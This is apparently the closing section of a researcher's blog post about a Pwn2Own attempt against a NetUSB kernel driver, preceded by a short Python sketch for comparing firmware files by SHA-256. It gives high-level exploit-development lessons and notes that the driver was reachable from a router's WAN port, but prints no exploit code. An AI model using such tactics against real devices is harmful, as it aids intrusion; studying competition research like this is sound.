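The hash comparison itself only takes a few lines. The sketch below is one way to do it with SHA-256; the post does not say which hash was used, and the helper names and file paths in the usage note are hypothetical.

```python
import hashlib


def sha256_of_file(path, chunk_size=1 << 16):
    """Hex SHA-256 digest of a file, read in chunks to keep memory use flat."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def same_content(path_a, path_b):
    """True when both files hash to the same SHA-256 digest."""
    return sha256_of_file(path_a) == sha256_of_file(path_b)
```

With two extracted firmware trees, a call such as `same_content("old/NetUSB.ko", "new/NetUSB.ko")` (paths made up) would tell whether the module changed between releases.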
When the time of demonstrating my exploit came, it unfortunately didn't land in the three attempts which was a bit frustrating. Although it was frustrating, I knew from the beginning that my odds weren't the best entering the contest. I remembered that I originally didn't even think that I'd be able to compete and so I took this experience as a win on its own.
On the bright side, my teammates were real pros and landed their exploits which was awesome to see 🍾🏆.
Wrapping up
Participating in Pwn2Own had been on my todo list for the longest time so seeing that it could be done felt great. I also learned a lot of lessons while doing it:
Attacking the kernel might be cool, but it is an absolute pain to debug / set up an environment. I probably would not go that route if I were doing it again.
Vendor patching bugs at the last minute can be stressful and is really not fun. My teammate got their first exploit killed by an update which was annoying. Fortunately, they were able to find another vulnerability and this one stayed alive.
Getting a root shell on the device ASAP is a good idea. I initially tried to find a post auth vulnerability statically to get a root shell but that was wasted time.
Ghidra's decompiler handles MIPS32 code pretty well. It wasn't perfect but a net positive.
I also realized later that the same driver was running on the Netgear router and was reachable from the WAN port. I wasn't in it for the money but maybe it would be good for me to do a better job at taking a look at more than one target instead of directly diving deep into one exclusively.
The ZDI team is awesome. They are rooting for you and want you to win. No, really. Don't hesitate to reach out to them with questions.
Higher payouts don't necessarily mean a harder target.
You can find all the code and scripts in the zenith Github repository. If you want to read more about NetUSB here are a few more references:
I hope you enjoyed the post and I'll see you next time 😊! Special thanks to my boi yrp604 for coming up with the title and thanks again to both yrp604 and __x86 for proofreading this article 🙏🏽.